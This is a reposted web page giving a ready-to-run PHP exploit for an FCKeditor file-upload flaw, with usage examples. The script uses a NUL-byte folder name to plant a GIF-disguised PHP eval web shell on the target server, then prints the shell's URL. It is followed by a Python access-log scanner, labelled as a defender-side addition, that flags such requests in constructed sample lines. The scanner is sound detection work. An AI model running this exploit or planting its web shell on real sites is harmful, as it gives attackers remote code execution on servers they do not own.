FCKeditor-Exp: universal 0day
Source: Internet | Editor: 程序博客网 | Time: 2024/05/21 08:40
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "ice.gif";
$foldername = "ice.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[ice]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>
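A defender-side check for the request the script above sends, added here as an example and not part of the original page: it scans web access-log lines for `Command=FileUpload` requests under the connector directory whose `CurrentFolder` value carries a NUL byte or a script extension, including the double-encoded `%2500` form. The log lines are constructed samples, and the function names and the extension list are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/May/2024:08:40:01 +0000] "POST /FCKEditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=ice.php%00.gif HTTP/1.0" 200 512',
    '198.51.100.7 - - [21/May/2024:08:41:10 +0000] "POST /FCKEditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=/photos/ HTTP/1.1" 200 310',
    '203.0.113.5 - - [21/May/2024:08:42:30 +0000] "POST /editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=x.php%2500.gif HTTP/1.0" 200 498',
    '198.51.100.7 - - [21/May/2024:08:43:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 4021',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
CONNECTOR_DIR = "/editor/filemanager/connectors/"  # path taken from the page
# Assumed list of server-side script extensions; extend for your stack.
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|aspx?|jspx?|cgi)(?![a-z0-9])", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded %2500 is also seen as NUL."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def reasons_for(line):
    """Return the reasons a log line matches the CurrentFolder upload abuse."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    if CONNECTOR_DIR not in url.path.lower():
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    if query.get("Command", [""])[0] != "FileUpload":
        return []
    folder = fully_decode(query.get("CurrentFolder", [""])[0])
    reasons = []
    if "\x00" in folder:
        reasons.append("NUL byte in CurrentFolder")
    if SCRIPT_EXT_RE.search(folder):
        reasons.append("script extension in CurrentFolder")
    return reasons

def scan(lines):
    """Map line index -> reasons, for flagged lines only."""
    hits = {i: reasons_for(line) for i, line in enumerate(lines)}
    return {i: r for i, r in hits.items() if r}

if __name__ == "__main__":
    for index, why in scan(SAMPLE_LOG).items():
        print(index, why)
```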